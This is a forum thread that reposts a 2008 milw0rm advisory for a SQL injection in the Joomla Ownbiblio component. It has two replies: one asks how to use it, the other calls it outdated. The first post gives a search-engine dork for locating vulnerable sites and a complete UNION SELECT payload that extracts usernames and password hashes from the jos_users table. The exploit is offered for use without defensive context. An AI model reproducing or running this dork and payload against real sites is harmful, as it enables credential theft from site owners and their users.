Results 1 to 3 of 3
  1. 10-13-2008 #1
    Token
    Token is offline
    Dual-Keyboard Member
    Token's Avatar
    Join Date
    Oct 2008
    Location
    Crackhouse
    Posts
    416
    Reputation
    10
    Thanks
    89
    Send a message via Birdie™ to Token

    Cool Joomla Component Ownbiblio SQL Injection Vulnerability

    Code:
    #############################################################################
#							                    #
#          Joomla Component Ownbiblio SQL Injection Vulnerability           #
#							                    #
#############################################################################


########################################

[~] Vulnerability found by: H!tm@N
[~] Contact: hitman[at]khg-crew[dot]ws
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de - [-=Kosova Hackers Group=-]

########################################

[~] ScriptName:    "Joomla"
[~] Component:     "Ownbiblio (com_ownbiblio)"
[~] Version:       "1.5.3" 
[~] Author:        "Sebastian Kruvinnus, Michael Kehrwecker"

########################################

[~] DORK: inurl:"com_ownbiblio" catalogue

########################################

[~] Exploit: /index.php?option=com_ownbiblio&view=catalogue&catid=[SQL]
[~] Example: /index.php?option=com_ownbiblio&view=catalogue&catid=-1+union+all+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--

########################################

[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] United States of Albania

########################################

# milw0rm.com [2008-10-11]
    Reply With Quote Reply With Quote
  2. 11-02-2009 #2
    [Jesuz]
    [Jesuz] is offline
    Newbie
    [Jesuz]'s Avatar
    Join Date
    Oct 2009
    Gender
    male
    Posts
    56
    Reputation
    10
    Thanks
    8
    Send a message via Birdie™ to [Jesuz]
    How to use?
    Reply With Quote Reply With Quote
  3. 11-02-2009 #3
    PyrexxHero®
    PyrexxHero® is offline
    Smoke with me
    MPGH Member
    PyrexxHero®'s Avatar
    Join Date
    Mar 2009
    Gender
    male
    Location
    My house
    Posts
    5,126
    Reputation
    706
    Thanks
    514
    My Mood
    Lurking
    Send a message via Birdie™ to PyrexxHero® United States
    Its over a year old.
    I doubt the vulnerability is still open.
    I doubt it was open when this was posted.

    Don't try to be a "hacker"
    You don't know any coding, so what makes you think you can?
    SuperBadassExtraordinaire says (5:53 PM):
    babysitting is ghey
    Corndog says (5:53 PM):
    ur ghey
    Baron De Montesquieu..Wtf? [Czar] says (5:53 PM):
    you're a breaded hotdog
    Reply With Quote Reply With Quote
« Previous Thread | Next Thread »

Similar Threads

  1. login.facebook.com SQL Injection Vulnerability
    By Callo in forum Exploits
    Replies: 4
    Last Post: 02-18-2014, 07:00 PM
  2. e107 <= 0.6172 (resetcore.php) Remote SQL Injection Exploit:
    By RoB07 in forum Exploits
    Replies: 4
    Last Post: 02-18-2014, 06:40 PM
  3. JAMM CMS (id) Blind SQL Injection Vulnerability
    By Mr.Dark Shark!! in forum Exploits
    Replies: 4
    Last Post: 08-03-2008, 10:55 AM
  4. Question about SQL Injections
    By darkounet in forum General Game Hacking
    Replies: 0
    Last Post: 06-29-2007, 11:13 PM
  5. KO can be sql injected
    By sf0d in forum General Game Hacking
    Replies: 2
    Last Post: 01-26-2006, 09:50 PM

Tags for this Thread